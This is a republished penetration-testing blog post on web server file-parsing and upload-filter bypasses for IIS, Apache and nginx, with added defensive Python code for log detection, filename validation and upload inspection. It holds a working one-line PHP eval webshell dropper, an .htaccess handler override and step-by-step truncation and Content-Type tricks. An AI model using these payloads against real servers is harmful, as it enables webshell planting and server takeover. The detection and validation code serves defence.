On file parsing and uploading vulnerability

Source: Internet
Author: User

[Image: China Chopper (中国菜刀)]

In web penetration testing the two vulnerability classes I most hope to find are arbitrary command execution (for example the Struts2 vulnerabilities) and file upload, because both are the fastest and most direct routes to control of the server. Even with an arbitrary command execution vulnerability, if the target is reached through an intranet mapping it may still be necessary to upload a Trojan file by some other means in order to obtain a webshell, and then use the webshell for port forwarding or privilege escalation.
This article summarises my own experience with file upload. It is divided into two parts: file parsing vulnerabilities and file upload vulnerabilities.

File Parsing Vulnerability

A parsing vulnerability arises when IIS, Apache, Nginx or another server treats a specially named file as a script under certain conditions, interprets it in that script's format, and executes it.

IIS 5.x/6.0 Parsing Vulnerability

IIS 6.0 has three main parsing vulnerabilities:
1. Directory parsing: /xx.asp/xx.jpg
Create a folder under the site named xx.asp or xx.asa; every file inside that directory, whatever its extension, is parsed and executed by IIS as an ASP file. An attacker therefore only needs to upload an image Trojan into that directory and never has to change its extension.
2. File parsing: xx.asp;.jpg
IIS 6.0 does not parse past the semicolon, so xx.asp;.jpg is executed as an ASP script.
3. File type parsing: ASA/CER/CDX
Besides ASP, the file types IIS 6.0 executes by default include ASA, CER and CDX.

Apache Parsing Vulnerability

Apache judges the extension from right to left: if the rightmost extension is not a type it recognises, it continues leftward until it finds one it can handle, so a file named xx.php.wer.xxxxx is parsed as PHP.

IIS 7.0/nginx <8.03 Malformed Parsing vulnerability

With the default fast-cgi settings, upload a file named xx.jpg whose content is:
<?PHP fputs(fopen('shell.php','w'),'<?php eval($_POST[cmd])?>');?>
Then request xx.jpg/.php; a one-line Trojan shell.php is generated in that directory.

nginx<8.03 null-byte code execution vulnerability

In the following Nginx versions: 0.5.*, 0.6.*, 0.7 <= 0.7.65, 0.8 <= 0.8.37, when PHP is executed through php-fastcgi, the URL and fastcgi handle a %00 null byte inconsistently. Embedding PHP code in an image and then requesting xxx.jpg%00.php causes the code to be executed.
Another Nginx issue is parsing from left to right, which can bypass suffix restrictions and allow a Trojan file to be uploaded, for example XXX.jpg.php (success may depend on luck or on the application's own code, but it is worth trying when nothing else works). The request looks like this:
Content-Disposition: form-data; name="userfiles"; filename="XXX.jpg.php"
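As an added example (not from the original post), here is detection logic a defender can run over web server access logs to flag requests that use the IIS 6 directory and semicolon tricks, the Apache multi-extension trick, the IIS 7/nginx xx.jpg/.php PATH_INFO trick and the nginx %00 trick described above. The log lines are constructed, and the function names, pattern labels and extension sets are my own choices.

```python
import re
from urllib.parse import unquote

# Constructed sample access-log lines (not from the original post), in common
# log format with a request line; the request path is what we inspect.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2024:10:00:01 +0000] "GET /images/logo.png HTTP/1.1" 200 5120
10.0.0.7 - - [01/Jan/2024:10:00:02 +0000] "GET /uploads/xx.jpg/.php HTTP/1.1" 200 88
10.0.0.7 - - [01/Jan/2024:10:00:03 +0000] "GET /uploads/xxx.jpg%00.php HTTP/1.1" 200 88
10.0.0.9 - - [01/Jan/2024:10:00:04 +0000] "GET /upload/x.asp/pic.jpg HTTP/1.1" 200 31
10.0.0.9 - - [01/Jan/2024:10:00:05 +0000] "GET /upload/shell.asp;.jpg HTTP/1.1" 200 31
10.0.0.9 - - [01/Jan/2024:10:00:06 +0000] "GET /upload/XXX.jpg.php HTTP/1.1" 200 31
10.0.0.5 - - [01/Jan/2024:10:00:07 +0000] "GET /docs/report.php HTTP/1.1" 200 2048
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
)

# Extensions the servers in the post execute as script, and ones expected to be static.
SCRIPT_EXTS = {"php", "php3", "phtml", "asp", "aspx", "asa", "cer", "cdx", "jsp"}
STATIC_EXTS = {"jpg", "jpeg", "png", "gif", "bmp", "txt", "pdf"}


def _ext(name):
    """Lower-cased final extension of a path segment, or '' if it has none."""
    return name.rsplit(".", 1)[-1].lower() if "." in name else ""


def classify_path(path):
    """Return the parsing-vulnerability patterns a request path matches (empty if none)."""
    findings = []
    decoded = unquote(path.split("?", 1)[0])  # %00 -> NUL byte, %3B -> ';'
    if "\x00" in decoded:
        findings.append("null_byte")           # xxx.jpg%00.php
    segments = [s for s in decoded.split("/") if s]
    if not segments:
        return findings
    last = segments[-1]
    # IIS 6 directory parsing: a directory named x.asp / x.asa makes everything under it ASP.
    if any(_ext(seg) in SCRIPT_EXTS for seg in segments[:-1]):
        findings.append("script_named_directory")
    # IIS 6 semicolon truncation: shell.asp;.jpg is served as ASP.
    if ";" in last and _ext(last.split(";", 1)[0]) in SCRIPT_EXTS:
        findings.append("semicolon_extension")
    # PATH_INFO abuse: a static file followed by /.php (IIS 7 / nginx with cgi.fix_pathinfo).
    if len(segments) >= 2 and _ext(last) in SCRIPT_EXTS and _ext(segments[-2]) in STATIC_EXTS:
        findings.append("static_file_pathinfo")
    # Double extension: XXX.jpg.php, or Apache-style xx.php.wer.xxxxx with unknown trailing parts.
    parts = last.split(".")
    if len(parts) >= 3:
        inner = {p.lower() for p in parts[1:-1]}
        if parts[-1].lower() in SCRIPT_EXTS and inner & STATIC_EXTS:
            findings.append("double_extension")
        elif inner & SCRIPT_EXTS and parts[-1].lower() not in SCRIPT_EXTS | STATIC_EXTS:
            findings.append("apache_multi_extension")
    return findings


def scan_log(text):
    """Return (ip, path, findings) for every log line whose request path matches a pattern."""
    hits = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        findings = classify_path(m.group("path"))
        if findings:
            hits.append((m.group("ip"), m.group("path"), findings))
    return hits


if __name__ == "__main__":
    for ip, path, findings in scan_log(SAMPLE_LOG):
        print(f"{ip}\t{path}\t{','.join(findings)}")
```

The xx.jpg/.php case exists because PHP's cgi.fix_pathinfo is enabled and the server hands any path to the FastCGI backend; alongside detection, set cgi.fix_pathinfo=0 or restrict which locations are passed to PHP, and keep the web server patched past the affected nginx versions listed above.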

htaccess file parsing

If Apache honours .htaccess files and one can be uploaded, try writing the following into .htaccess:
<FilesMatch "shell.jpg">SetHandler application/x-httpd-php</FilesMatch>
Then upload the Trojan as shell.jpg; it will be parsed as a PHP file.

Operating System feature resolution

Windows strips trailing spaces and dots from a file name when the file is created. If a blacklist check forbids uploading PHP files and the server runs Windows, upload the file as xx.php followed by a space, or as xx.php. with a trailing dot; this bypasses the blacklist check.
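As an added example (not code from the original post), here is server-side file name validation that defeats the name-based tricks from the IIS 6, Apache, .htaccess and Windows sections above: it strips Windows trailing dots and spaces before checking, rejects semicolons, NUL and non-ASCII bytes, dot-files and double extensions, uses an allowlist instead of a blacklist, and never stores the client's name at all. The function names, the allowlist and the random-name scheme are my own choices.

```python
import os
import re
import secrets

# Allowlist of extensions the application really needs; anything else is rejected,
# so a blacklist (php, asp, ...) that Windows name mangling can sidestep is never consulted.
ALLOWED_EXTS = {"jpg", "jpeg", "png", "gif", "pdf"}


class RejectedUpload(ValueError):
    """Raised when a client-supplied file name fails validation."""


def normalize_client_name(filename):
    """Reduce a client-supplied file name to a plain base name, rejecting the tricks in the post."""
    if not isinstance(filename, str) or not filename:
        raise RejectedUpload("empty file name")
    if "\x00" in filename:
        raise RejectedUpload("NUL byte in file name")            # 00 truncation
    if any(not 0x20 <= ord(c) <= 0x7E for c in filename):
        raise RejectedUpload("non-printable or non-ASCII byte")   # 0x80-0xEF style truncation
    # Keep only the last path component, whichever separator the client used
    # (a directory named x.asp is never created from client input).
    base = re.split(r"[\\/]", filename)[-1]
    if ";" in base:
        raise RejectedUpload("semicolon in file name")           # xx.asp;.jpg
    # Windows drops trailing dots and spaces when creating the file, so strip them
    # first; otherwise "xx.php." would pass an extension check and land as xx.php.
    base = base.rstrip(". ")
    if not base or base.startswith("."):
        raise RejectedUpload("empty or dot-file name")           # .htaccess, .user.ini
    return base


def validate_extension(base):
    """Return the lower-cased extension of base if it is allowed; reject double extensions."""
    parts = base.lower().split(".")
    if len(parts) < 2 or not parts[-1]:
        raise RejectedUpload("missing extension")
    if len(parts) > 2:
        raise RejectedUpload("multiple extensions")              # XXX.jpg.php, xx.php.wer.xxxxx
    if parts[-1] not in ALLOWED_EXTS:
        raise RejectedUpload(f"extension not allowed: {parts[-1]}")
    return parts[-1]


def storage_path(filename, upload_dir):
    """Map a client name to a server-chosen random name inside upload_dir.

    The client name contributes only its validated extension; the stored name is
    random, so none of the name-based parsing tricks survive storage.
    """
    ext = validate_extension(normalize_client_name(filename))
    dest = os.path.realpath(os.path.join(upload_dir, f"{secrets.token_hex(16)}.{ext}"))
    root = os.path.realpath(upload_dir)
    if os.path.commonpath([root, dest]) != root:
        raise RejectedUpload("path escapes upload directory")
    return dest


def rejection_reason(filename):
    """Return why a name would be rejected, or None if it is acceptable (useful for logging)."""
    try:
        validate_extension(normalize_client_name(filename))
    except RejectedUpload as exc:
        return str(exc)
    return None


if __name__ == "__main__":
    for name in ["photo.JPG", "xx.php. ", "xx.php\x00.jpg", "xx.asp;.jpg",
                 "XXX.jpg.php", ".htaccess", "x.asp/pic.jpg"]:
        print(repr(name), "->", rejection_reason(name) or "accepted")
```

The upload directory itself should additionally be served with script execution disabled (no handler for .php/.asp there and no .htaccess processing), so that a file which slips past the name check is still only ever returned as static content.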

File Upload Vulnerability

File Header Spoofing Vulnerability

Prepend gif89a to a one-line Trojan and save it with an image extension; this fools a simple WAF.

FilePath vulnerability

The FilePath vulnerability is used to break the server's automatic naming rules. There are two main ways to use it:
1. Change the upload path (filepath) and combine it with the directory parsing vulnerability: path/x.asp/
2. Change the file name directly (everything under FilePath is modified): path/x.asp;.

00 Truncation

There are two ways to use 00 truncation:
1. Change the file name to xx.php .jpg (with a space) and in Burp Suite change the hex 20 of that space to 00.
2. Change the file name to xx.php%00.jpg and in Burp Suite right-click the %00 and choose Convert selection > URL > URL-decode.

FileType vulnerability

The FileType vulnerability concerns the Content-Type field. There are two main ways to use it:
1. Upload an image first, then change Content-Type: image/jpeg to Content-Type: text/asp, apply 00 truncation to the file name, and replace the image content with a one-line Trojan.
2. Capture the POST upload request with Burp and change Content-Type: text/plain to Content-Type: image/gif.

iconv function Limit Upload

If, whatever file you upload, the stored file always receives an added .jpg suffix, suspect that the iconv function is being used to restrict uploads. A method similar to 00 truncation applies, except that the truncating byte is not 00 but one in the range 80 to EF. If iconv really is in use, any file can then be uploaded: upload xx.php followed by a space and, in the packet, change that space's hex value 20 to any byte from 80 to EF.
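As an added example (not from the original post), here is content inspection for an upload handler that covers the file header spoofing and FileType sections above and the Content-Disposition/Content-Type fields shown earlier: it parses a multipart/form-data body, checks the declared Content-Type against an allowlist, verifies that the body's magic bytes match the declared extension, and flags script markers inside what claims to be an image. The request body is constructed, the embedded PHP tag is a harmless marker, and the parser and function names are my own.

```python
import re

# Magic bytes expected for each allowed extension (a tuple, since bytes.startswith accepts one).
IMAGE_MAGIC = {
    "jpg": (b"\xff\xd8\xff",),
    "jpeg": (b"\xff\xd8\xff",),
    "png": (b"\x89PNG\r\n\x1a\n",),
    "gif": (b"GIF87a", b"GIF89a"),
}
ALLOWED_CONTENT_TYPES = {"image/jpeg", "image/png", "image/gif"}
# Script markers that have no business inside an image body (compared case-insensitively).
SCRIPT_MARKERS = (b"<?php", b"<?=", b"<%", b"<script", b"eval(", b"fputs(", b"fopen(")

BOUNDARY = b"----ConstructedBoundary"


def _part(filename, ctype, data):
    """Build one multipart/form-data file part (constructed sample input)."""
    return (b"--" + BOUNDARY + b"\r\n"
            b'Content-Disposition: form-data; name="userfiles"; filename="' + filename.encode() + b'"\r\n'
            b"Content-Type: " + ctype.encode() + b"\r\n\r\n" + data + b"\r\n")


# Constructed request body: a genuine 1x1 GIF, a GIF89a-prefixed "image" carrying a
# harmless PHP tag (the file header spoofing trick), and a .php file declared as text/plain.
SAMPLE_BODY = (
    _part("real.gif", "image/gif", b"GIF89a\x01\x00\x01\x00\x00\x00\x00;")
    + _part("fake.jpg", "image/jpeg", b"GIF89a<?php /* constructed marker */ ?>")
    + _part("note.php", "text/plain", b"hello")
    + b"--" + BOUNDARY + b"--\r\n"
)


def parse_multipart(body, boundary):
    """Return [(headers, data), ...] for each part of a multipart/form-data body."""
    parts = []
    for chunk in body.split(b"--" + boundary)[1:]:
        if chunk.startswith(b"--"):          # closing delimiter: --boundary--
            break
        head, _, data = chunk.lstrip(b"\r\n").partition(b"\r\n\r\n")
        headers = {}
        for line in head.split(b"\r\n"):
            name, _, value = line.decode("latin-1").partition(":")
            headers[name.strip().lower()] = value.strip()
        if data.endswith(b"\r\n"):           # CRLF that precedes the next delimiter
            data = data[:-2]
        parts.append((headers, data))
    return parts


def inspect_file(filename, content_type, data):
    """Return the problems found with one uploaded file (empty list if it looks like a real image)."""
    findings = []
    ctype = content_type.lower()
    ext = filename.rsplit(".", 1)[-1].lower() if "." in filename else ""
    if ctype not in ALLOWED_CONTENT_TYPES:
        findings.append(f"content-type not allowed: {ctype or 'missing'}")
    magic = IMAGE_MAGIC.get(ext)
    if magic is None:
        findings.append(f"extension not allowed: {ext or 'none'}")
    elif not data.startswith(magic):
        findings.append("magic bytes do not match extension")
    lowered = data.lower()
    hits = [m.decode() for m in SCRIPT_MARKERS if m in lowered]
    if hits:
        findings.append("script marker in body: " + ", ".join(hits))
    return findings


def scan_body(body, boundary):
    """Map each uploaded file name in the body to the findings for that file."""
    report = {}
    for headers, data in parse_multipart(body, boundary):
        m = re.search(r'filename="([^"]*)"', headers.get("content-disposition", ""))
        if m:                                # only file fields carry a filename
            report[m.group(1)] = inspect_file(m.group(1), headers.get("content-type", ""), data)
    return report


if __name__ == "__main__":
    for name, findings in scan_body(SAMPLE_BODY, BOUNDARY).items():
        print(name, "->", findings or "ok")
```

Marker scanning is a heuristic: binary image data can contain "<%" by chance, and a payload can be encoded to avoid the strings. The dependable defence is to re-encode every accepted image with an image library (which discards anything that is not pixel data) and store the result under a server-chosen name, in a directory the web server never executes scripts from.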

Dual File Upload

On a page with a file upload, right-click and inspect the element. First change the form's action to the full path, then copy and paste the file-selection input (<input ...>) so that there are two upload boxes; choose a normal file in the first and a one-line Trojan in the second, then submit.

Form Submit button

Sometimes a scan finds an upload path that has only a file-selection box and no submit button; in that case write the submit button yourself.
Writing the form:
Press F12 to inspect the element and add the submit button code below the file-selection form:
<input type="submit" value="提交" name="xx">


This article is from the "eth10" blog; please keep this source: http://eth10.blog.51cto.com/13143704/1956032
